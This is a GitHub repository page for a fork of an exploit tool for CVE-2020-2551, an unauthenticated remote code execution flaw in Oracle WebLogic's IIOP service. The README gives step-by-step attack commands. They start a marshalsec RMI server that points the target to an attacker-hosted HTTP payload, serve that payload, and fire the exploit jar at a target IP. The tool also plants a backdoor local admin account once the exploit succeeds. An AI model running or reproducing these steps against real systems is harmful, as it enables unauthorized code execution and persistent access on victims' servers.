Skip to content

milo2012/CVE-2020-2551

 
 

Repository files navigation

CVE-2020-2551

Fork from https://github.com/Y4er/CVE-2020-2551 with some quality of life changes. See below for more details.

Description

A remote code execution vulnerability was found in Oracle Weblogic Server. A remote, unauthenticated attacker could exploit this vulnerability and cause a remote IIOP server to initialize a Java object that invokes a JNDI lookup to a remote, attacker-controlled server. A malicious JNDI lookup will result in code execution.

Changes

  • The original tool from https://github.com/Y4er/CVE-2020-2551 only support IIOP (7001/tcp). IIOPS (7002/tcp) was not implemented
  • Support for Weblogic (x.x.x.x:7002 instead of just x.x.x.x:7001)
  • Support for Weblogic servers that support TLS1.2 only
  • Detect when IIOP protocol have been disabled on the Weblogic server
  • Switch to SSL (IIOPS) when TCP port 7002 instead of 7001 (IIOP) has been selected
  • Add metasploit|metasploit local admin account on Weblogic server on successful exploitation

Prerequisites

Steps

Clone and Compile

# Copy jdk-6u45-linux-x64.bin and jdk-8u281-linux-x64.tar.gz to /tmp
$ apt-install ant
$ cd /tmp
$ wget https://github.com/RandomRobbieBF/marshalsec-jar/blob/master/marshalsec-0.0.3-SNAPSHOT-all.jar?raw=true -o marshalsec-0.0.3-SNAPSHOT-all.jar
$ tar xvfz jdk-8u281-linux-x64.tar.gz
$ ./jdk-6u45-linux-x64.bin
$ git clone http://peneuw2c-git01.fgxint.net:3000/klee/CVE-2020-2551
$ cd CVE-2020-2551
$ make

Dump and Import SSL Certificate

If you are targeting Weblogic server (x.x.x.x:7002) (iiops), run the below commands. Replace 172.16.164.2 with the correct IP address.
If you are targeting Weblogic server (x.x.x.x:7001) (iiop), skip this step

$ echo -n | openssl s_client -connect 172.16.164.2:7002 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/172.16.164.133.crt
$ keytool -import -v -trustcacerts -alias 172.16.164.2 -file ~/172.16.164.2.crt -keystore /tmp/jdk1.8.0_281/jre/lib/security/cacerts -keypass changeit -storepass changeit

Run each of the commands in different terminal

$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://172.16.164.1/#exp" 1099   
$ cd src && python3 -m http.server --bind 0.0.0.0 80
$ java -jar /tmp/CVE-2020-2551/build/jar/weblogic_CVE_2020_2551.jar 172.16.164.2 7001 rmi://172.16.164.1:1099/exp

About

Weblogic IIOP CVE-2020-2551

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Java 98.2%
  • Makefile 1.8%